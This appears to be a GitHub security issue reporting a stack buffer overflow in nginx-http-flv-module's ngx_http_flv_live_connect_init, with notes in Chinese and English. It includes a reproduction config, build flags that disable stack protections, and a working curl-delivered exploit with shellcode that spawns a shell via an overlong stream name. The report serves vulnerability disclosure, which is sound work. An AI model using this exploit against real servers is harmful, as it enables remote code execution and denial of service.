[security] Potential stack overflow in ngx_http_flv_live_connect_init #170
Description
ngx_memcpy(name, stream->data, stream->len);
name 定义为 u_char name[NGX_RTMP_MAX_NAME]; // #define NGX_RTMP_MAX_NAME 256, 如果stream 超过256字节,就会导致栈溢出
Configuration file / 配置文件
worker_processes 1;
error_log logs/error.log debug;
events {
worker_connections 1024;
}
rtmp {
publish_notify on;
server {
listen 1935;
on_connect http://127.0.0.1:8080/connect;
application live {
live on;
}
application pppo {
live on;
}
}
}
http {
server {
listen 8080;
location /live {
flv_live on;
}
location /connect {
return 302 pppo;
}
}
}
Steps to reproduce the behavior / 复现问题步骤
关闭保护机制编译可造成远程任意命令执行。
cd /src/nginx/; \
./auto/configure \
--user=www-data \
--group=www-data \
--add-module=/src/nginx-http-flv-module \
--with-cc-opt="-fno-stack-protector -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0" \
--with-ld-opt="-z norelro -no-pie -z execstack" \
--with-threads\
--with-http_ssl_module; \
make; \
make install;exploit (shellcode+padding+addr([jmp rsi]))
echo -e "http://127.0.0.1:8080/live\?app\=live\&stream\=j\xff_H\x89\xe6jAH\xff\xc7j4XH\x89\xe2\x0f\x05\x85\xc0u\xf1H\x89\xfdj\x03^H\xff\xcex\x0bVj\!XH\x89\xef\x0f\x05\xeb\xefjhH\xb8/bin///sPH\x89\xe7hri\x01\x01\x814$\x01\x01\x01\x011\xf6Vj\x08^H\x01\xe6VH\x89\xe61\xd2j;X\x0f\x05CCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLL\x9d\x8e\x42" | xargs curl -vv没有关闭保护机制可造成DoS漏洞